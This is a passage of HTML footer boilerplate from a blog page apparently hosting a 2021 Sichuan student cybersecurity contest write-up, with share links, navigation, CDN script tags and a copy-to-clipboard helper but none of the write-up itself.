  <li><a class="icon" href="mailto:?subject=2021年四川省大学生网络安全技能大赛  writeup&body=Check out this article: http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&name=2021年四川省大学生网络安全技能大赛  writeup&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&t=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/projects_url">Projects</a></li><!--
     --><!--
       --><li><a href="/%5Bobject%20Object%5D">highlight</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
